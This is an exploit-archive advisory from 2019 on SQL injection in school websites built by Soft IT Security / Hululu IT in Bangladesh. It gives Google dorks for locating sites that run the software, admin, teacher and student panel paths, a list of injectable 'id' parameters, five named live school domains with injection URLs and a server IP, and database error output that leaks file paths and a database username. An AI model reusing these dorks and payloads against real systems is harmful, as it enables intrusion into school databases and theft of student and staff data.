- ###############################################################
- # Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 08/01/2019
- # Vendor Homepage : softitsecurity.com ~ hululuit.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : intext:''© Copyright 2019. Designed and Developed by Soft IT Security'' site:edu.bd
- intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
- # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- # Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html
- # CXSecurity Exploit Reference Link : cxsecurity.com/issue/WLB-2019010043
- ###############################################################
- Admin/Teacher/Student Panel Login Path =>
- /adminoperation/
- /teacheroperation/
- /studentoperation/
- # SQL Injection Exploits :
- **********************
- /?v=home.jsp&id=[SQL Injection]
- /?v=administrationdeatils.jsp&id=[SQL Injection]
- /?v=allteacher.jsp&id=[SQL Injection]
- /?v=allclark.jsp&id=[SQL Injection]
- /?v=talentstudent-detail.jsp&id=[SQL Injection]
- /?v=allstudent.jsp&id=[SQL Injection]
- /?v=boardresultdetails.jsp&id=1%27
- /?v=universitydetails.jsp&id=[SQL Injection]
- /?v=talentteacher-detail.jsp&id=[SQL Injection]
- /?v=academiccalender-details.jsp&id=[SQL Injection]
- /?v=allevent.jsp&id=[SQL Injection]
- /?v=allresult.jsp&id=[SQL Injection]
- /?v=noticebord-detail.jsp&id=[SQL Injection]
- /?v=uploadbook-details.jsp&id=[SQL Injection]
- /?v=usefulllinkdetails.jsp&id=[SQL Injection]
- /?v=checkclass.jsp&id=[SQL Injection]
- ###############################################################
- # Example Vulnerable Sites =>
- ***************************
- Note : (192.185.94.62) => There are 182 domains hosted on this server.
- [+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27
- [+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27
- ###############################################################
- # SQL Database Error :
- *********************
- Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
- Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost' (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
- Warning: fread(): Length parameter must be greater than 0 in /home/haripuralimmadra/public_html/controller/function.php on line 220
- ###############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###############################################################